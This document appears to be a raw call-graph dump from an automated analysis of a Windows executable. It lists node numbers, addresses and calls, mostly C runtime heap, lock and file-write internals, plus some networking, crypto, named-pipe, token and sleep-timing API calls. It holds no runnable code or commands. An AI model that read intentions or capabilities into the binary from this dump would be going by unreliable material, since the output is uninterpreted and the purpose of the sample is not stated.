18184 46b1d5c __NMSG_WRITE 66 API calls 18182->18184 18187 46b0fda 18184->18187 18185 46b0fff 18188 46b1006 18185->18188 18189 46b1015 18185->18189 18186->18166 18192 46af061 __mtinitlocknum 3 API calls 18187->18192 18190 46b0e0c _calloc 66 API calls 18188->18190 18191 46b1075 __lock 66 API calls 18189->18191 18190->18186 18193 46b101c 18191->18193 18192->18180 18194 46b1050 18193->18194 18195 46b1024 18193->18195 18197 46ae93e __getstream 66 API calls 18194->18197 18216 46b4417 18195->18216 18198 46b1041 18197->18198 18220 46b106c 18198->18220 18199 46b102f 18199->18198 18201 46ae93e __getstream 66 API calls 18199->18201 18202 46b103b 18201->18202 18203 46b0e0c _calloc 66 API calls 18202->18203 18203->18198 18205 46b1f07 __FF_MSGBANNER 66 API calls 18204->18205 18206 46af017 18205->18206 18207 46b1d5c __NMSG_WRITE 66 API calls 18206->18207 18208 46af01f 18207->18208 18209 46b03d1 __decode_pointer 6 API calls 18208->18209 18210 46af02a 18209->18210 18210->18164 18215 46b79d6 18211->18215 18212 46aea1b _malloc 65 API calls 18212->18215 18213 46b7a0c 18213->18185 18214 46b79ed Sleep 18214->18215 18215->18212 18215->18213 18215->18214 18223 46b1b6c 18216->18223 18218 46b4423 InitializeCriticalSectionAndSpinCount 18219 46b4467 __fsopen 18218->18219 18219->18199 18224 46b0f9b RtlLeaveCriticalSection 18220->18224 18222 46b1073 18222->18186 18223->18218 18224->18222 18226 46b1401 RtlReAllocateHeap 18225->18226 18227 46b1435 RtlAllocateHeap 18225->18227 18228 46b141f 18226->18228 18229 46b1423 18226->18229 18227->18228 18230 46b1458 VirtualAlloc 18227->18230 18228->18170 18229->18227 18230->18228 18231 46b1472 HeapFree 18230->18231 18231->18228 18233 46b14b5 VirtualAlloc 18232->18233 18235 46b14fc 18233->18235 18235->18174 18236->18177 18252 46b044c TlsGetValue 18237->18252 18240 46b05c3 18257 46b7a12 18240->18257 18241 46b0611 SetLastError 18241->18050 18244 46b03d1 __decode_pointer 6 API calls 18245 46b05e9 18244->18245 18246 46b0608 18245->18246 18247 46b05f0 18245->18247 18249 46ae93e __getstream 63 API calls 18246->18249 18262 46b04bd 18247->18262 18251 46b060e 18249->18251 18250 46b05f8 GetCurrentThreadId 18250->18241 18251->18241 18253 46b047c 18252->18253 18254 46b0461 18252->18254 18253->18240 18253->18241 18255 46b03d1 __decode_pointer 6 API calls 18254->18255 18256 46b046c TlsSetValue 18255->18256 18256->18253 18258 46b7a1b 18257->18258 18260 46b05cf 18258->18260 18261 46b7a39 Sleep 18258->18261 18280 46bc2dc 18258->18280 18260->18241 18260->18244 18261->18258 18297 46b1b6c 18262->18297 18264 46b04c9 GetModuleHandleW 18265 46b04d9 18264->18265 18266 46b04df 18264->18266 18267 46aefdd __crt_waiting_on_module_handle 2 API calls 18265->18267 18268 46b051b 18266->18268 18269 46b04f7 GetProcAddress GetProcAddress 18266->18269 18267->18266 18270 46b1075 __lock 62 API calls 18268->18270 18269->18268 18271 46b053a InterlockedIncrement 18270->18271 18298 46b0592 18271->18298 18274 46b1075 __lock 62 API calls 18275 46b055b 18274->18275 18301 46b72e4 InterlockedIncrement 18275->18301 18277 46b0579 18313 46b059b 18277->18313 18279 46b0586 __fsopen 18279->18250 18281 46bc2e8 __fsopen 18280->18281 18282 46bc300 18281->18282 18292 46bc31f _memset 18281->18292 18283 46b0e0c _calloc 65 API calls 18282->18283 18284 46bc305 18283->18284 18286 46b2df7 __fsopen 6 API calls 18284->18286 18285 46bc391 RtlAllocateHeap 18285->18292 18287 46bc315 __fsopen 18286->18287 18287->18258 18288 46b1f4f _realloc 6 API calls 18288->18292 18289 46b1075 __lock 65 API calls 18289->18292 18290 46b1887 ___sbh_alloc_block 5 API calls 18290->18292 18292->18285 18292->18287 18292->18288 18292->18289 18292->18290 18293 46bc3d8 18292->18293 18296 46b0f9b RtlLeaveCriticalSection 18293->18296 18295 46bc3df 18295->18292 18296->18295 18297->18264 18316 46b0f9b RtlLeaveCriticalSection 18298->18316 18300 46b0554 18300->18274 18302 46b7302 InterlockedIncrement 18301->18302 18303 46b7305 18301->18303 18302->18303 18304 46b730f InterlockedIncrement 18303->18304 18305 46b7312 18303->18305 18304->18305 18306 46b731f 18305->18306 18307 46b731c InterlockedIncrement 18305->18307 18308 46b7329 InterlockedIncrement 18306->18308 18309 46b732c 18306->18309 18307->18306 18308->18309 18310 46b7345 InterlockedIncrement 18309->18310 18311 46b7355 InterlockedIncrement 18309->18311 18312 46b7360 InterlockedIncrement 18309->18312 18310->18309 18311->18309 18312->18277 18317 46b0f9b RtlLeaveCriticalSection 18313->18317 18315 46b05a2 18315->18279 18316->18300 18317->18315 18320 46b1117 18318->18320 18323 46b13b9 18318->18323 18319 46b1303 VirtualFree 18321 46b1367 18319->18321 18320->18319 18320->18323 18322 46b1376 VirtualFree HeapFree 18321->18322 18321->18323 18322->18323 18323->17987 18327 46b0f9b RtlLeaveCriticalSection 18324->18327 18326 46ae99b 18326->17980 18327->18326 18329 4699ee6 18328->18329 18331 4699eed 18328->18331 18332 4699da9 18329->18332 18331->17958 18333 4699db9 18332->18333 18334 4699db5 18332->18334 18335 46aea1b _malloc 66 API calls 18333->18335 18340 4699e15 18333->18340 18334->18331 18338 4699dcf _memset 18335->18338 18337 4699e2b 18337->18331 18338->18337 18341 46a51db 18338->18341 18346 46a4d4b 18340->18346 18352 46a5173 CryptAcquireContextA 18341->18352 18344 46a51fa 18344->18340 18347 46a4d5d 18346->18347 18351 46a4d59 18346->18351 18348 46a4d94 18347->18348 18349 46ae93e __getstream 66 API calls 18347->18349 18347->18351 18350 46aea1b _malloc 66 API calls 18348->18350 18349->18348 18350->18351 18351->18337 18353 46a519c CryptAcquireContextA 18352->18353 18354 46a51b3 CryptGenRandom 18352->18354 18353->18354 18355 46a51af 18353->18355 18356 46a51c8 CryptReleaseContext 18354->18356 18357 46a51d7 18354->18357 18355->18344 18358 46a50fd 18355->18358 18356->18355 18357->18356 18361 46a5117 18358->18361 18359 46a516b 18359->18344 18360 46bef1b GetSystemTimeAsFileTime _clock 18360->18361 18361->18359 18361->18360 18363 46aea1b _malloc 66 API calls 18362->18363 18364 469cf6a 18363->18364 18365 46aea1b _malloc 66 API calls 18364->18365 18368 469cf87 _memset 18364->18368 18366 469cf7a 18365->18366 18367 46ae93e __getstream 66 API calls 18366->18367 18366->18368 18367->18368 18368->17834 18648 46aec25 GetSystemTimeAsFileTime 18369->18648 18371 46a1bcd 18650 46aefa9 18371->18650 18374 46aea1b _malloc 66 API calls 18375 46a1c14 _memset _memcpy_s 18374->18375 18653 46b0295 18375->18653 18377 46a1cad 18378 46ae93e __getstream 66 API calls 18377->18378 18380 46945cd 18378->18380 18379 46b0295 _strtok 66 API calls 18381 46a1c3b _strncpy 18379->18381 18382 469a70c 18380->18382 18381->18377 18381->18379 18383 46aec25 __time64 GetSystemTimeAsFileTime 18382->18383 18384 469a722 18383->18384 18385 46aefa9 66 API calls 18384->18385 18386 469a729 18385->18386 18663 469a79e 18386->18663 18389 46a4b98 18390 46a4bb1 18389->18390 18395 46a4bc4 _memset 18389->18395 18391 46a4bba 18390->18391 18392 46a4bc6 18390->18392 18393 46aea1b _malloc 66 API calls 18391->18393 18675 46b0961 18392->18675 18393->18395 18395->17840 18397 4697ddd 18396->18397 18398 4697de1 18397->18398 18399 4697de3 GetLocalTime 18397->18399 18398->17844 18400 4697df5 18399->18400 18400->17844 18402 4697e8a 18401->18402 18406 4694629 18402->18406 18715 46a0f6b 18402->18715 18404 4697ec5 18719 46a0f96 18404->18719 18406->17853 18406->17854 18408 4697f02 18407->18408 18409 4697f9d htonl htonl 18408->18409 18416 4694637 18408->18416 18410 4697fbd 18409->18410 18409->18416 18411 46aea1b _malloc 66 API calls 18410->18411 18412 4697fc6 _memcpy_s 18411->18412 18413 46a0f6b 116 API calls 18412->18413 18418 469801b _memset 18412->18418 18414 4697ffb 18413->18414 18417 46a0f96 102 API calls 18414->18417 18415 46ae93e __getstream 66 API calls 18415->18416 18416->17858 18416->17860 18417->18418 18418->18415 18420 46a51db 5 API calls 18419->18420 18421 469ce33 18420->18421 19166 46a0d1f 18421->19166 18424 46aefa9 66 API calls 18425 469ce57 18424->18425 19173 46944d6 18425->19173 18427 469ce5d 18428 469ce70 18427->18428 18429 469ce76 GetCurrentProcess 18427->18429 19176 46a459b AllocateAndInitializeSid 18428->19176 19231 469897e GetModuleHandleA GetProcAddress 18429->19231 18435 469cea6 19182 4696851 18435->19182 18438 4696851 htonl 18439 469cec2 18438->18439 18440 4696851 htonl 18439->18440 18441 469cecf 18440->18441 19186 4696802 htonl 18441->19186 18444 4696802 2 API calls 18445 469cee4 18444->18445 19189 469681f htons 18445->19189 18453 469cf05 _memset _memcpy_s 19224 46a0df8 18453->19224 18455 469cf4a _memset 18455->17869 18458 46a4ded 18456->18458 18457 46946b4 18457->17872 18457->17874 18458->18457 18459 46a4e34 htonl htonl 18458->18459 18459->18457 18462 4699d61 18460->18462 18461 4699d6f 18461->17896 18462->18461 19404 4699be2 18462->19404 18465 46a1fa9 18464->18465 18466 46a1fa2 18464->18466 18469 46a1fa7 18465->18469 19756 46a1e17 18465->19756 19748 46a1d96 18466->19748 18469->17896 19771 46a4016 18470->19771 18475 4696cbf 18477 4696c6a 18477->18475 18482 46972a9 18481->18482 18483 46972ae 18481->18483 18482->17896 18484 46a4016 RevertToSelf 18483->18484 18485 46972b3 18484->18485 19818 469709e 18485->19818 18490 46a205a 18489->18490 18491 46a206b 18490->18491 18492 46a2080 18490->18492 18494 46a207e 18490->18494 18491->18494 19866 46a2217 18491->19866 18493 46a2217 139 API calls 18492->18493 18492->18494 18493->18494 18494->17896 19907 469d902 18496->19907 18499 469dda1 19935 469dc39 18499->19935 18502 469ddaa GetTickCount 18502->18499 18503 469ddb0 18502->18503 19946 469db9b 18503->19946 18507 46a51db 5 API calls 18506->18507 18508 469748b 18507->18508 18508->17896 19980 4699b21 18509->19980 18512 4699da9 71 API calls 18513 4699abb 18512->18513 18514 4699ace Sleep 18513->18514 19986 4699e5e 18513->19986 18515 4699ad5 18514->18515 18515->17896 18517 4699ac9 18517->18514 18517->18515 18519 46a3f56 18518->18519 18520 46a3f8c 18519->18520 18521 4699b69 73 API calls 18519->18521 18523 4695fb0 156 API calls 18520->18523 18522 46a3f87 18521->18522 20064 4699d7f 18522->20064 18525 46a3f94 18523->18525 20068 469c288 18525->20068 18530 46a3fe9 18531 46a400e ExitProcess 18530->18531 18532 46a3fee 18530->18532 20085 46a2e65 18532->20085 18533 46a3fa9 Sleep 18533->18533 18534 46a3fb6 18535 46a3fe6 RtlExitUserThread 18534->18535 20081 46a3f25 18534->20081 18535->18530 18540 469a042 66 API calls 18541 46a3fd4 18540->18541 18542 4699f1a 71 API calls 18541->18542 18543 46a3fe3 18542->18543 18543->18535 18545 469ab5e __mbschr_l 18544->18545 18546 469ace6 18545->18546 18547 46aea1b _malloc 66 API calls 18545->18547 18546->17896 18548 469aba3 18547->18548 18549 46aea1b _malloc 66 API calls 18548->18549 18550 469abae _memset _memcpy_s 18549->18550 18551 46aefbb _rand 66 API calls 18550->18551 18552 469ac23 _memset _memcpy_s 18550->18552 18551->18552 18553 469ab4c 66 API calls 18552->18553 18554 469acc3 18553->18554 18555 46ae93e __getstream 66 API calls 18554->18555 18559 46a0b2a 18558->18559 18560 46a0b31 18558->18560 18559->17896 18561 46aea1b _malloc 66 API calls 18560->18561 18562 46a0b3a 18561->18562 18563 46a0b4f 18562->18563 20139 46a7555 18562->20139 18565 46ae93e __getstream 66 API calls 18563->18565 18565->18559 18566 46af27d 66 API calls 18569 46a0b6a _memcpy_s 18566->18569 18567 46a7204 5 API calls 18567->18569 18568 469cff3 htonl 18568->18569 18569->18563 18569->18566 18569->18567 18569->18568 18570 46a0c1c 18569->18570 18574 46a0c63 _memcpy_s 18569->18574 18571 46ae93e __getstream 66 API calls 18570->18571 18572 46a0c24 18571->18572 18575 46ae93e __getstream 66 API calls 18574->18575 18575->18559 18577 469f1aa htonl htonl 18576->18577 18579 469f1e7 _memset 18576->18579 18578 469f1ca 18577->18578 18577->18579 18578->18577 18578->18579 18579->17896 18581 469958d 18580->18581 18582 46995d0 18580->18582 18584 46995a4 18581->18584 20181 4699496 18581->20181 18582->17897 18584->18582 18585 46995d2 18584->18585 18587 46ae93e __getstream 66 API calls 18584->18587 18586 46ae93e __getstream 66 API calls 18585->18586 18586->18582 18587->18584 18589 469c60a 18588->18589 18590 469c610 GetTickCount 18589->18590 18592 469c645 18589->18592 18590->18589 18591 469c616 GetTickCount htonl 18590->18591 18593 4694495 139 API calls 18591->18593 18592->17897 18593->18589 18595 469bb4e 18594->18595 18606 469bc10 18594->18606 18596 46aea1b _malloc 66 API calls 18595->18596 18599 469bb58 18596->18599 18597 469bb5b htonl htonl htonl 18597->18599 18599->18597 18602 4694495 139 API calls 18599->18602 18603 469bbcc WaitForSingleObject 18599->18603 18604 469bbfb _memset 18599->18604 20467 469bce9 18599->20467 20476 469bc1d PeekNamedPipe 18599->20476 20482 469bc82 18599->20482 18602->18599 18603->18599 18605 46ae93e __getstream 66 API calls 18604->18605 18605->18606 18606->17897 18608 4694495 139 API calls 18607->18608 18609 4697434 18608->18609 18609->17897 18611 4696de9 _memset 18610->18611 18612 4697008 18611->18612 18613 469ea45 66 API calls 18611->18613 18612->17897 18614 4696e23 18613->18614 18615 4696e7d 18614->18615 18617 4696e42 18614->18617 18616 46aeb76 __snprintf 102 API calls 18615->18616 18622 4696e6a _memset 18616->18622 18619 469ab4c 66 API calls 18617->18619 18618 46aeb76 __snprintf 102 API calls 18623 4696eb3 18618->18623 18620 4696e4f 18619->18620 18621 46aeb76 __snprintf 102 API calls 18620->18621 18621->18622 18622->18618 18649 46aec55 __aulldiv 18648->18649 18649->18371 18658 46b061d 18650->18658 18654 46b061d __getptd 66 API calls 18653->18654 18655 46b02b8 18654->18655 18656 46b655e failwithmessage 5 API calls 18655->18656 18657 46b0354 18656->18657 18657->18381 18659 46b05a4 __getptd_noexit 66 API calls 18658->18659 18660 46b0625 18659->18660 18661 46a1bd3 18660->18661 18662 46af00d __amsg_exit 66 API calls 18660->18662 18661->18374 18662->18661 18664 469a7b0 18663->18664 18665 46945d5 18663->18665 18672 469d036 18664->18672 18665->18389 18667 46aea1b _malloc 66 API calls 18671 469a7c8 18667->18671 18668 469d271 htons 18668->18671 18669 46a4b98 71 API calls 18669->18671 18670 469d036 htons 18670->18671 18671->18665 18671->18667 18671->18668 18671->18669 18671->18670 18673 469d043 18672->18673 18674 469d047 htons 18672->18674 18673->18671 18674->18673 18676 46b096d __fsopen 18675->18676 18677 46b0982 18676->18677 18678 46b0974 18676->18678 18679 46b0989 18677->18679 18680 46b0995 18677->18680 18681 46aea1b _malloc 66 API calls 18678->18681 18682 46ae93e __getstream 66 API calls 18679->18682 18688 46b0b07 18680->18688 18708 46b09a2 _memcpy_s ___sbh_resize_block ___sbh_find_block 18680->18708 18683 46b097c __fsopen _realloc 18681->18683 18682->18683 18683->18395 18684 46b0b3a 18686 46b1f4f _realloc 6 API calls 18684->18686 18685 46b0b0c RtlReAllocateHeap 18685->18683 18685->18688 18689 46b0b40 18686->18689 18687 46b1075 __lock 66 API calls 18687->18708 18688->18684 18688->18685 18690 46b0b5e 18688->18690 18692 46b1f4f _realloc 6 API calls 18688->18692 18694 46b0b54 18688->18694 18691 46b0e0c _calloc 66 API calls 18689->18691 18690->18683 18693 46b0e0c _calloc 66 API calls 18690->18693 18691->18683 18692->18688 18695 46b0b67 GetLastError 18693->18695 18697 46b0e0c _calloc 66 API calls 18694->18697 18695->18683 18709 46b0ad5 18697->18709 18698 46b0a2d RtlAllocateHeap 18698->18708 18699 46b0ada GetLastError 18699->18683 18700 46b0a82 RtlReAllocateHeap 18700->18708 18701 46b1887 ___sbh_alloc_block 5 API calls 18701->18708 18702 46b0aed 18702->18683 18704 46b0e0c _calloc 66 API calls 18702->18704 18703 46b1f4f _realloc 6 API calls 18703->18708 18706 46b0afa 18704->18706 18705 46b0ad0 18707 46b0e0c _calloc 66 API calls 18705->18707 18706->18683 18706->18695 18707->18709 18708->18683 18708->18684 18708->18687 18708->18698 18708->18700 18708->18701 18708->18702 18708->18703 18708->18705 18710 46b10d8 VirtualFree VirtualFree HeapFree ___sbh_free_block 18708->18710 18711 46b0aa5 18708->18711 18709->18683 18709->18699 18710->18708 18714 46b0f9b RtlLeaveCriticalSection 18711->18714 18713 46b0aac 18713->18708 18714->18713 18716 46a0f7c 18715->18716 18718 46a0f78 18715->18718 18727 46a0f0a 18716->18727 18718->18404 18720 46aeb76 __snprintf 102 API calls 18719->18720 18721 46a1019 18720->18721 18722 46aeb76 __snprintf 102 API calls 18721->18722 18724 46a102b _memcpy_s 18722->18724 18726 46a10f4 _strncmp 18724->18726 19136 46af27d 18724->19136 19139 46a7204 18724->19139 18726->18406 18734 46aeb76 18727->18734 18729 46a0f23 18729->18729 18730 46aeb76 __snprintf 102 API calls 18729->18730 18731 46a0f5d 18730->18731 18749 46aef9e 18731->18749 18735 46aeba3 18734->18735 18736 46aeb86 18734->18736 18738 46aebcf 18735->18738 18740 46aebb2 18735->18740 18737 46b0e0c _calloc 66 API calls 18736->18737 18739 46aeb8b 18737->18739 18752 46b2128 18738->18752 18741 46b2df7 __fsopen 6 API calls 18739->18741 18742 46b0e0c _calloc 66 API calls 18740->18742 18746 46aeb9b 18741->18746 18745 46aebb7 18742->18745 18747 46b2df7 __fsopen 6 API calls 18745->18747 18746->18729 18747->18746 18750 46aef88 18749->18750 19084 46b3ce0 18750->19084 18792 46b00cd 18752->18792 18755 46b2193 18756 46b0e0c _calloc 66 API calls 18755->18756 18757 46b2198 18756->18757 18759 46b2df7 __fsopen 6 API calls 18757->18759 18760 46b21aa 18759->18760 18761 46b655e failwithmessage 5 API calls 18760->18761 18762 46aebfd 18761->18762 18762->18746 18771 46b1f77 18762->18771 18764 46b2e88 100 API calls _write_multi_char 18765 46b21d4 __aulldvrm _strlen 18764->18765 18765->18755 18765->18760 18765->18764 18766 46ae93e __getstream 66 API calls 18765->18766 18767 46b2ebb 100 API calls _write_multi_char 18765->18767 18768 46b20db 100 API calls _write_string 18765->18768 18769 46b896d 78 API calls __cftof 18765->18769 18770 46b03d1 6 API calls __decode_pointer 18765->18770 18806 46b78ca 18765->18806 18766->18765 18767->18765 18768->18765 18769->18765 18770->18765 18772 46b5392 __fileno 66 API calls 18771->18772 18773 46b1f87 18772->18773 18774 46b1fa9 18773->18774 18775 46b1f92 18773->18775 18777 46b1fad 18774->18777 18785 46b1fba __flsbuf 18774->18785 18776 46b0e0c _calloc 66 API calls 18775->18776 18779 46b1f97 18776->18779 18778 46b0e0c _calloc 66 API calls 18777->18778 18778->18779 18779->18746 18780 46b20aa 18783 46b52b6 __locking 100 API calls 18780->18783 18781 46b202a 18782 46b2041 18781->18782 18787 46b205e 18781->18787 18912 46b52b6 18782->18912 18783->18779 18785->18779 18788 46b2010 18785->18788 18791 46b201b 18785->18791 18900 46b8787 18785->18900 18787->18779 18937 46b6445 18787->18937 18788->18791 18909 46b873e 18788->18909 18791->18780 18791->18781 18793 46b00e0 18792->18793 18799 46b012d 18792->18799 18794 46b061d __getptd 66 API calls 18793->18794 18795 46b00e5 18794->18795 18796 46b010d 18795->18796 18809 46b744a 18795->18809 18796->18799 18824 46b6cde 18796->18824 18799->18755 18799->18765 18800 46b5392 18799->18800 18801 46b53a1 18800->18801 18805 46b53b6 18800->18805 18802 46b0e0c _calloc 66 API calls 18801->18802 18803 46b53a6 18802->18803 18804 46b2df7 __fsopen 6 API calls 18803->18804 18804->18805 18805->18765 18807 46b00cd _LocaleUpdate::_LocaleUpdate 76 API calls 18806->18807 18808 46b78dd 18807->18808 18808->18765 18810 46b7456 __fsopen 18809->18810 18811 46b061d __getptd 66 API calls 18810->18811 18812 46b745b 18811->18812 18813 46b7489 18812->18813 18814 46b746d 18812->18814 18815 46b1075 __lock 66 API calls 18813->18815 18817 46b061d __getptd 66 API calls 18814->18817 18816 46b7490 18815->18816 18840 46b740c 18816->18840 18819 46b7472 18817->18819 18822 46b7480 __fsopen 18819->18822 18823 46af00d __amsg_exit 66 API calls 18819->18823 18822->18796 18823->18822 18825 46b6cea __fsopen 18824->18825 18826 46b061d __getptd 66 API calls 18825->18826 18827 46b6cef 18826->18827 18828 46b1075 __lock 66 API calls 18827->18828 18831 46b6d01 18827->18831 18830 46b6d1f 18828->18830 18829 46b6d68 18896 46b6d79 18829->18896 18830->18829 18833 46b6d50 InterlockedIncrement 18830->18833 18834 46b6d36 InterlockedDecrement 18830->18834 18832 46b6d0f __fsopen 18831->18832 18836 46af00d __amsg_exit 66 API calls 18831->18836 18832->18799 18833->18829 18834->18833 18837 46b6d41 18834->18837 18836->18832 18837->18833 18838 46ae93e __getstream 66 API calls 18837->18838 18839 46b6d4f 18838->18839 18839->18833 18841 46b7410 18840->18841 18847 46b7442 18840->18847 18842 46b72e4 ___addlocaleref 8 API calls 18841->18842 18841->18847 18843 46b7423 18842->18843 18843->18847 18851 46b7373 18843->18851 18848 46b74b4 18847->18848 18895 46b0f9b RtlLeaveCriticalSection 18848->18895 18850 46b74bb 18850->18819 18852 46b7407 18851->18852 18853 46b7384 InterlockedDecrement 18851->18853 18852->18847 18865 46b719b 18852->18865 18854 46b7399 InterlockedDecrement 18853->18854 18855 46b739c 18853->18855 18854->18855 18856 46b73a9 18855->18856 18857 46b73a6 InterlockedDecrement 18855->18857 18858 46b73b3 InterlockedDecrement 18856->18858 18859 46b73b6 18856->18859 18857->18856 18858->18859 18860 46b73c0 InterlockedDecrement 18859->18860 18861 46b73c3 18859->18861 18860->18861 18862 46b73dc InterlockedDecrement 18861->18862 18863 46b73f7 InterlockedDecrement 18861->18863 18864 46b73ec InterlockedDecrement 18861->18864 18862->18861 18863->18852 18864->18861 18866 46b721f 18865->18866 18867 46b71b2 18865->18867 18868 46b726c 18866->18868 18869 46ae93e __getstream 66 API calls 18866->18869 18867->18866 18876 46ae93e __getstream 66 API calls 18867->18876 18878 46b71e6 18867->18878 18870 46ba69a ___free_lc_time 66 API calls 18868->18870 18879 46b7293 18868->18879 18871 46b7240 18869->18871 18872 46b728c 18870->18872 18873 46ae93e __getstream 66 API calls 18871->18873 18877 46ae93e __getstream 66 API calls 18872->18877 18880 46b7253 18873->18880 18874 46ae93e __getstream 66 API calls 18884 46b7214 18874->18884 18875 46b72d8 18885 46ae93e __getstream 66 API calls 18875->18885 18886 46b71db 18876->18886 18877->18879 18881 46ae93e __getstream 66 API calls 18878->18881 18894 46b7207 18878->18894 18879->18875 18882 46ae93e 66 API calls __getstream 18879->18882 18883 46ae93e __getstream 66 API calls 18880->18883 18887 46b71fc 18881->18887 18882->18879 18888 46b7261 18883->18888 18889 46ae93e __getstream 66 API calls 18884->18889 18890 46b72de 18885->18890 18891 46ba874 ___free_lconv_mon 66 API calls 18886->18891 18892 46ba82f ___free_lconv_num 66 API calls 18887->18892 18893 46ae93e __getstream 66 API calls 18888->18893 18889->18866 18890->18847 18891->18878 18892->18894 18893->18868 18894->18874 18895->18850 18899 46b0f9b RtlLeaveCriticalSection 18896->18899 18898 46b6d80 18898->18831 18899->18898 18901 46b8794 18900->18901 18903 46b87a3 18900->18903 18902 46b0e0c _calloc 66 API calls 18901->18902 18904 46b8799 18902->18904 18905 46b87c7 18903->18905 18906 46b0e0c _calloc 66 API calls 18903->18906 18904->18788 18905->18788 18907 46b87b7 18906->18907 18908 46b2df7 __fsopen 6 API calls 18907->18908 18908->18905 18910 46b79cd __malloc_crt 66 API calls 18909->18910 18911 46b8753 18910->18911 18911->18791 18913 46b52c2 __fsopen 18912->18913 18914 46b52ca 18913->18914 18915 46b52e5 18913->18915 18969 46b0e1f 18914->18969 18917 46b52f3 18915->18917 18921 46b5334 18915->18921 18919 46b0e1f __locking 66 API calls 18917->18919 18920 46b52f8 18919->18920 18923 46b0e0c _calloc 66 API calls 18920->18923 18972 46b9d47 18921->18972 18922 46b0e0c _calloc 66 API calls 18930 46b52d7 __fsopen 18922->18930 18925 46b52ff 18923->18925 18927 46b2df7 __fsopen 6 API calls 18925->18927 18926 46b533a 18928 46b535d 18926->18928 18929 46b5347 18926->18929 18927->18930 18932 46b0e0c _calloc 66 API calls 18928->18932 18982 46b4b83 18929->18982 18930->18779 18934 46b5362 18932->18934 18933 46b5355 19041 46b5388 18933->19041 18935 46b0e1f __locking 66 API calls 18934->18935 18935->18933 18938 46b6451 __fsopen 18937->18938 18939 46b647e 18938->18939 18940 46b6462 18938->18940 18942 46b648c 18939->18942 18943 46b64ad 18939->18943 18941 46b0e1f __locking 66 API calls 18940->18941 18945 46b6467 18941->18945 18944 46b0e1f __locking 66 API calls 18942->18944 18947 46b64cd 18943->18947 18948 46b64f3 18943->18948 18946 46b6491 18944->18946 18949 46b0e0c _calloc 66 API calls 18945->18949 18951 46b0e0c _calloc 66 API calls 18946->18951 18952 46b0e1f __locking 66 API calls 18947->18952 18950 46b9d47 ___lock_fhandle 67 API calls 18948->18950 18953 46b646f __fsopen 18949->18953 18954 46b64f9 18950->18954 18955 46b6498 18951->18955 18956 46b64d2 18952->18956 18953->18779 18957 46b6522 18954->18957 18958 46b6506 18954->18958 18959 46b2df7 __fsopen 6 API calls 18955->18959 18960 46b0e0c _calloc 66 API calls 18956->18960 18962 46b0e0c _calloc 66 API calls 18957->18962 18961 46b63c0 __lseeki64_nolock 68 API calls 18958->18961 18959->18953 18963 46b64d9 18960->18963 18967 46b6517 18961->18967 18964 46b6527 18962->18964 18965 46b2df7 __fsopen 6 API calls 18963->18965 18966 46b0e1f __locking 66 API calls 18964->18966 18965->18953 18966->18967 19080 46b6554 18967->19080 18970 46b05a4 __getptd_noexit 66 API calls 18969->18970 18971 46b0e24 18970->18971 18971->18922 18973 46b9d53 __fsopen 18972->18973 18974 46b9dae 18973->18974 18976 46b1075 __lock 66 API calls 18973->18976 18975 46b9db3 RtlEnterCriticalSection 18974->18975 18978 46b9dd0 __fsopen 18974->18978 18975->18978 18977 46b9d7f 18976->18977 18979 46b9d96 18977->18979 18981 46b4417 __getstream InitializeCriticalSectionAndSpinCount 18977->18981 18978->18926 19044 46b9dde 18979->19044 18981->18979 18983 46b4b92 __write_nolock 18982->18983 18984 46b4beb 18983->18984 18985 46b4bc4 18983->18985 19015 46b4bb9 18983->19015 18988 46b4c53 18984->18988 18989 46b4c2d 18984->18989 18987 46b0e1f __locking 66 API calls 18985->18987 18986 46b655e failwithmessage 5 API calls 18990 46b52b4 18986->18990 18991 46b4bc9 18987->18991 18993 46b4c67 18988->18993 19048 46b63c0 18988->19048 18992 46b0e1f __locking 66 API calls 18989->18992 18990->18933 18994 46b0e0c _calloc 66 API calls 18991->18994 18996 46b4c32 18992->18996 18995 46b8787 __flsbuf 66 API calls 18993->18995 18998 46b4bd0 18994->18998 18999 46b4c72 18995->18999 19000 46b0e0c _calloc 66 API calls 18996->19000 19001 46b2df7 __fsopen 6 API calls 18998->19001 19002 46b4f18 18999->19002 19007 46b061d __getptd 66 API calls 18999->19007 19003 46b4c3b 19000->19003 19001->19015 19005 46b4f28 19002->19005 19006 46b51e7 WriteFile 19002->19006 19004 46b2df7 __fsopen 6 API calls 19003->19004 19004->19015 19008 46b5006 19005->19008 19031 46b4f3c 19005->19031 19010 46b521a GetLastError 19006->19010 19011 46b4efa 19006->19011 19009 46b4c8d GetConsoleMode 19007->19009 19030 46b50e6 19008->19030 19033 46b5015 19008->19033 19009->19002 19013 46b4cb8 19009->19013 19010->19011 19012 46b5265 19011->19012 19011->19015 19017 46b5238 19011->19017 19012->19015 19016 46b0e0c _calloc 66 API calls 19012->19016 19013->19002 19014 46b4cca GetConsoleCP 19013->19014 19014->19011 19039 46b4ced 19014->19039 19015->18986 19021 46b5288 19016->19021 19018 46b5243 19017->19018 19019 46b5257 19017->19019 19023 46b0e0c _calloc 66 API calls 19018->19023 19061 46b0e32 19019->19061 19020 46b4faa WriteFile 19020->19010 19020->19031 19027 46b0e1f __locking 66 API calls 19021->19027 19022 46b514c WideCharToMultiByte 19022->19010 19024 46b5183 WriteFile 19022->19024 19028 46b5248 19023->19028 19029 46b51ba GetLastError 19024->19029 19024->19030 19025 46b508a WriteFile 19025->19010 19025->19033 19027->19015 19032 46b0e1f __locking 66 API calls 19028->19032 19029->19030 19030->19011 19030->19012 19030->19022 19030->19024 19031->19011 19031->19012 19031->19020 19032->19015 19033->19011 19033->19012 19033->19025 19035 46b4d99 WideCharToMultiByte 19035->19011 19037 46b4dca WriteFile 19035->19037 19036 46b9baf 78 API calls __fassign 19036->19039 19037->19010 19037->19039 19038 46b99d3 11 API calls __putwch_nolock 19038->19039 19039->19010 19039->19011 19039->19035 19039->19036 19039->19038 19040 46b4e1e WriteFile 19039->19040 19058 46b7902 19039->19058 19040->19010 19040->19039 19079 46b9de7 RtlLeaveCriticalSection 19041->19079 19043 46b5390 19043->18930 19047 46b0f9b RtlLeaveCriticalSection 19044->19047 19046 46b9de5 19046->18974 19047->19046 19066 46b9cd0 19048->19066 19050 46b63de 19051 46b63f7 SetFilePointer 19050->19051 19052 46b63e6 19050->19052 19054 46b640f GetLastError 19051->19054 19055 46b63eb 19051->19055 19053 46b0e0c _calloc 66 API calls 19052->19053 19053->19055 19054->19055 19056 46b6419 19054->19056 19055->18993 19057 46b0e32 __dosmaperr 66 API calls 19056->19057 19057->19055 19059 46b78ca __isleadbyte_l 76 API calls 19058->19059 19060 46b7911 19059->19060 19060->19039 19062 46b0e1f __locking 66 API calls 19061->19062 19063 46b0e3d _realloc 19062->19063 19064 46b0e0c _calloc 66 API calls 19063->19064 19065 46b0e50 19064->19065 